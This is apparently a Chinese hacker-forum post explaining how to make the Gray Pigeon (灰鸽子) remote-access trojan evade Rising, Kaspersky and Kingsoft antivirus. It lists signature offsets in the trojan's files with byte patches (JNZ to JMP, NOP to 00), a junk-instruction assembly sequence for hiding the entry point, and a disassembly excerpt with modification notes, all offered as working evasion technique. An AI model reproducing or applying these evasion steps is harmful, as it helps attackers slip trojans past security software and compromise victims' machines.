把软件也发上来 让大家看看 ! 都是,,软件都没看到,,,,, 厉害`高人一个 需要用的东西` 需要用的东西
灰鸽子免杀 --3月13日-- 网络疯子专版
好久没来黑狼看看了,这个是从以前做的免杀 基础做的 以下具体介绍下现在免杀就是一个字了 难了
IEXPLORE.EXE
===============================未生成前 DAT的免杀
[特征] 001C5AF9_00000001 005C5AF9
===========================
过卡吧 瑞星
[特征] 0009A534_00000002内存地址:0049B134注:用ASM32 小写换成大写
[特征] 0009A8D6_00000002内存地址:0049B4D6注:用OD载入后把上面的JNZ 该成JMP (JNZ 在汇编指令中意思是 如果0标志没有置位则跳转,JMP 无条件跳转 意思就是不鸟他了直接条,这样能跳过瑞星 和 卡吧的重要查杀过程。)
[特征] 0009B76A_00000002内存地址:0049C36A注:和上面一样 OD载入后 把内存地址的JNZ 改成JMP
过金山
[特征] 00074098_00000002内存地址:00474C98注:用ASM32 NOP(90) 改成00,意思是一样的,但能免杀
[特征] 0007409C_00000002 和以上相近 注:和上面一样 NOP 改成00
============================生成后过金山 服务端 的免杀===========================
[特征] 000B902B_00000002 10月13日
[特征] 00074098_00000002 10月15日
[注意] 0009ABA2_000000020049B7A210月19日 jbe
[特征] 0009ABA3_00000001
==================================说明=================================
过瑞星 (主 表)过卡吧 (主 表) 过金山(表) 其他请自行测试 本人没装
由于先做了DAT免杀后 杀软不再杀了 但是生成后,金山还要杀 所以特做了生成后的服务端免杀
2008年10月10日晚 10点10分 完成只用于本人发布的DAT文件 其他不一样 配合本人的灰鸽子软件使用
软件名字为 网络疯子反编译专用版
制作人:网络疯子 QQ:345125185有问题联系我,希望几个相互学习。
===================================================================================
[特征] 008475D8_0000000200C475D8
=======================================13日 过瑞星==============================
[特征] 0009ABA2_000000020049B7A2je 改成JlE15生成后过瑞星
===========================10月19日======================================
[特征] 000740A8_00000001 金山DAT 大小转换
[特征] 000B902B_00000001 金山文件大小转换
-----------------------------------------------------------花指令---------------
push ebp (新入口)
mov ebp, esp
inc ecx
dec ecx
nop
sub eax, 2
inc eax
inc eax
pop ebp
push ebp
pop ebp
push ebp
jmp short 下一个花指令的开头
add byte ptr ds:,al ↓
add byte ptr ds:,al ↓
add byte ptr ds:,al ↓
add byte ptr ds:,al ↓
push esp ←--------← 就是跳到这里 ↑
pop esp ↑
push 20 ↑
nop ↑
push -14
push -4 ↑
nop
add esp,1 ↑
sub esp,1 ↑
sub eax,2
inc eax ↑
inc eax
mov eax, 下一个花指令的启始地质↓ ↑
jmp eax ↓ ↑
add byte ptr ds:,al ↓
add byte ptr ds:,al ↓ ↑
add byte ptr ds:,al ↓
add byte ptr ds:,al ↓ ↑
push ebp ←←←←←←← 就是跳到这里 ↑
mov ebp,esp
push 0 ↑
pop ebp
push ebp ↑
push -3
push 1 ↑
nop
push 2 ↑
nop
nop ↑
push 这里跳到老入口
retn
==================================================================
文件名:C:\\灰鸽子.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005F7DF_00000002
[特征] 0005F875_00000002
[特征] 0005FBDF_00000002
[特征] 00060541_00000002
[特征] 0008496F_00000002
[特征] 00084C49_00000002
[特征] 00084DB7_00000002
[特征] 00085D6F_00000002
[特征] 00088967_00000002
[特征] 0009B769_00000002
[特征] 0009BC1D_00000002
[特征] 000B1803_00000002
[特征] 000B22BD_00000002 -
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[----------------------------MMM-------------------]
[----------------------------MMM---M---------------]
[---------M-----------------------------MM---------]
文件名:C:\\灰鸽子.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005FBE0_00000002a
[特征] 00084970_00000002b
[特征] 00084DB7_00000002 -c
[特征] 00085D6F_00000002d
[特征] 00088967_00000002- e
[特征] 0009BC1D_00000002- f
[特征] 0009E5BE_00000002 g
[特征] 000B282E_00000002h
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[-----------------------------M--------------------]
[----------------------------MMM---M---------------]
[---------M---M--------------------------M---------]
文件名:C:\\灰鸽子.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000A5BAB_00000002
[特征] 000A694F_00000002
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[-----------------------MM-------------------------]
LANGWENAINI
wangluofeng
NIAILANGWEN
fengziainia
ZHICHILANGWEN
gandiaosharan
159740HACKER FENGZIHacker Fengzi
文件名:C:\\wlfz.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 0005CAAA_00000002
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[-------------------------M------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
========================09年3月13日 免杀技巧=====================================
特征码 物理地址/物理长度 如下:
[特征] 0005CDE0_00000002 [修改方式: ORXOR]
[特征] 000A1402_00000002 [-- -- : XJ--> X +1]
[特征] 000B1802_00000002 [ -- --: NOP ]
0045D9D390NOP
0045D9D4 $53PUSH EBX
0045D9D5 .56PUSH ESI
0045D9D6 .8BDAMOV EBX,EDX
0045D9D8 .8BF0MOV ESI,EAX
0045D9DA .83C9 FF OR ECX,FFFFFFFF
0045D9DD >33D2XOR EDX,EDX
0045D9DF .8BC6MOV EAX,ESI
=================由于时间关系 就不做其他免杀了 这个过 卡吧 瑞星============
页:
[1]